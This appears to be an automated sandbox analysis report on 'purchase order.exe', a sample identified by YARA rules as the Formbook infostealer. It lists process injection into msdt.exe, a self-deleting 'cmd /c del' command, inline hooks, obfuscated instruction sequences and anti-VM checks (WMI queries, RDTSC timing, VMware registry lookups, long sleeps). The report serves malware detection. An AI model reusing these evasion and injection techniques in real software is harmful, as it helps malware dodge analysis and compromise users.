Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_01872EF7 2_2_01872EF7
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0186D616 2_2_0186D616
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0486841F 5_2_0486841F
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0491D466 5_2_0491D466
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04882581 5_2_04882581
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_049225DD 5_2_049225DD
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0486D5E0 5_2_0486D5E0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04922D07 5_2_04922D07
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04850D20 5_2_04850D20
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04921D55 5_2_04921D55
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04922EF7 5_2_04922EF7
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0491D616 5_2_0491D616
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04876E30 5_2_04876E30
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0492DFCE 5_2_0492DFCE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04921FF1 5_2_04921FF1
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0486B090 5_2_0486B090
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048820A0 5_2_048820A0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_049220A8 5_2_049220A8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_049228EC 5_2_049228EC
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04911002 5_2_04911002
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0492E824 5_2_0492E824
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0485F900 5_2_0485F900
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04874120 5_2_04874120
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_049222AE 5_2_049222AE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0490FA2B 5_2_0490FA2B
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0488EBB0 5_2_0488EBB0
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0491DBD2 5_2_0491DBD2
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_049103DA 5_2_049103DA
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_04922B28 5_2_04922B28
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0487AB40 5_2_0487AB40
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0063D853 5_2_0063D853
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0063D816 5_2_0063D816
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0063D38E 5_2_0063D38E
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_00622D88 5_2_00622D88
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_00622D90 5_2_00622D90
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_00629E30 5_2_00629E30
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0063E73A 5_2_0063E73A
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_00622FB0 5_2_00622FB0
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\msdt.exe Code function: String function: 0485B150 appears 48 times
Source: C:\Users\user\Desktop\purchase order.exe Code function: String function: 017AB150 appears 35 times
Sample file is different than original file name gathered from version info
Source: purchase order.exe, 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameKedermister.dllT vs purchase order.exe
Source: purchase order.exe, 00000000.00000000.333598877.00000000009B0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameL6HC.exeP vs purchase order.exe
Source: purchase order.exe, 00000002.00000002.395144348.000000000189F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs purchase order.exe
Source: purchase order.exe, 00000002.00000000.353042240.0000000000CD0000.00000002.00020000.sdmp Binary or memory string: OriginalFilenameL6HC.exeP vs purchase order.exe
Source: purchase order.exe, 00000002.00000002.395621910.0000000003380000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamemsdt.exej% vs purchase order.exe
Source: purchase order.exe Binary or memory string: OriginalFilenameL6HC.exeP vs purchase order.exe
Yara signature match
Source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.598821666.0000000000620000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.394597129.00000000014A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.356215152.0000000003D27000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.599779534.0000000000E10000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.599557812.0000000000950000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.394487409.0000000001470000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.purchase order.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.purchase order.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/1@6/3
Source: C:\Users\user\Desktop\purchase order.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\purchase order.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6476:120:WilError_01
Source: purchase order.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\purchase order.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: purchase order.exe Virustotal: Detection: 28%
Source: purchase order.exe ReversingLabs: Detection: 19%
Source: unknown Process created: C:\Users\user\Desktop\purchase order.exe 'C:\Users\user\Desktop\purchase order.exe'
Source: unknown Process created: C:\Users\user\Desktop\purchase order.exe C:\Users\user\Desktop\purchase order.exe
Source: unknown Process created: C:\Windows\SysWOW64\msdt.exe C:\Windows\SysWOW64\msdt.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\purchase order.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\purchase order.exe Process created: C:\Users\user\Desktop\purchase order.exe C:\Users\user\Desktop\purchase order.exe Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\purchase order.exe' Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: purchase order.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: purchase order.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.377355938.0000000007BA0000.00000002.00000001.sdmp
Source: Binary string: msdt.pdbGCTL source: purchase order.exe, 00000002.00000002.395621910.0000000003380000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: purchase order.exe, 00000002.00000002.395144348.000000000189F000.00000040.00000001.sdmp, msdt.exe, 00000005.00000002.601559435.0000000004830000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: purchase order.exe, msdt.exe
Source: Binary string: msdt.pdb source: purchase order.exe, 00000002.00000002.395621910.0000000003380000.00000040.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.377355938.0000000007BA0000.00000002.00000001.sdmp

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_063A5252 push ecx; iretd 0_2_063A5253
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_063A2B1C push es; iretd 0_2_063A2B22
Source: C:\Users\user\Desktop\purchase order.exe Code function: 0_2_06A2E18D push FFFFFF8Bh; iretd 0_2_06A2E18F
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0041D075 push eax; ret 2_2_0041D0C8
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0041C802 push esi; iretd 2_2_0041C803
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0041D0C2 push eax; ret 2_2_0041D0C8
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0041D0CB push eax; ret 2_2_0041D132
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0041E172 pushfd ; ret 2_2_0041E174
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0041D12C push eax; ret 2_2_0041D132
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_004182CC push cs; retf 2_2_004182CE
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0041E4F5 push dword ptr [537421FAh]; ret 2_2_0041E515
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_00419C92 pushfd ; iretd 2_2_00419C98
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_0041674D push 8EAE14C8h; iretd 2_2_00416753
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_004167AE push C6E9D42Ah; ret 2_2_004167C2
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_017FD0D1 push ecx; ret 2_2_017FD0E4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_048AD0D1 push ecx; ret 5_2_048AD0E4
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0063D075 push eax; ret 5_2_0063D0C8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0063C802 push esi; iretd 5_2_0063C803
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0063D0C2 push eax; ret 5_2_0063D0C8
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0063D0CB push eax; ret 5_2_0063D132
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0063E172 pushfd ; ret 5_2_0063E174
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0063D12C push eax; ret 5_2_0063D132
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_006382CC push cs; retf 5_2_006382CE
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0063E4F5 push dword ptr [537421FAh]; ret 5_2_0063E515
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_00639C92 pushfd ; iretd 5_2_00639C98
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_0063674D push 8EAE14C8h; iretd 5_2_00636753
Source: C:\Windows\SysWOW64\msdt.exe Code function: 5_2_006367AE push C6E9D42Ah; ret 5_2_006367C2
Source: initial sample Static PE information: section name: .text entropy: 7.23319521913

Hooking and other Techniques for Hiding and Protection:

barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x87 0x7E 0xEE
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM_3
Source: Yara match File source: 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: purchase order.exe PID: 3900, type: MEMORY
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\Desktop\purchase order.exe WMI Queries: IWbemServices::ExecQuery - ROOT\cimv2 : SELECT * FROM Win32_VideoController
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: purchase order.exe, 00000000.00000002.355570300.0000000002F00000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: purchase order.exe, 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: purchase order.exe, 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\purchase order.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\purchase order.exe RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 00000000006298E4 second address: 00000000006298EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 0000000000629B4E second address: 0000000000629B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\purchase order.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0 name: Identifier Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0 Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\purchase order.exe Code function: 2_2_00409A80 rdtsc 2_2_00409A80
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\purchase order.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\purchase order.exe TID: 5016 Thread sleep time: -49972s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\purchase order.exe TID: 4456 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 7048 Thread sleep time: -64000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\msdt.exe Last function: Thread delayed
Source: explorer.exe, 00000003.00000000.378092448.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000003.00000000.378015974.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: purchase order.exe, 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000003.00000000.373701178.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: purchase order.exe, 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II|update users set password = @password where user_id = @user_id
Source: explorer.exe, 00000003.00000000.374586186.0000000006410000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000003.00000002.612924741.00000000062E0000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
Source: purchase order.exe, 00000000.00000002.355570300.0000000002F00000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: explorer.exe, 00000003.00000000.373701178.0000000005D50000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.381193325.000000000D484000.00000004.00000001.sdmp Binary or memory string: 8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: purchase order.exe, 00000000.00000002.355593298.0000000002F08000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: purchase order.exe, 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000003.00000000.378386869.0000000008540000.00000004.00000001.sdmp Binary or memory string: c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&-
Source: explorer.exe, 00000003.00000000.374586186.0000000006410000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: purchase order.exe, 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmp Binary or memory string: vmware
Source: purchase order.exe, 00000000.00000002.355570300.0000000002F00000.00000004.00000001.sdmp Binary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000003.00000000.378015974.00000000083EB000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000003.00000000.377852959.00000000082E2000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
Source: explorer.exe, 00000003.00000000.373701178.0000000005D50000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.377852959.00000000082E2000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: purchase order.exe, 00000000.00000002.355570300.0000000002F00000.00000004.00000001.sdmp Binary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000003.00000000.378092448.0000000008430000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: explorer.exe, 00000003.00000000.373701178.0000000005D50000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
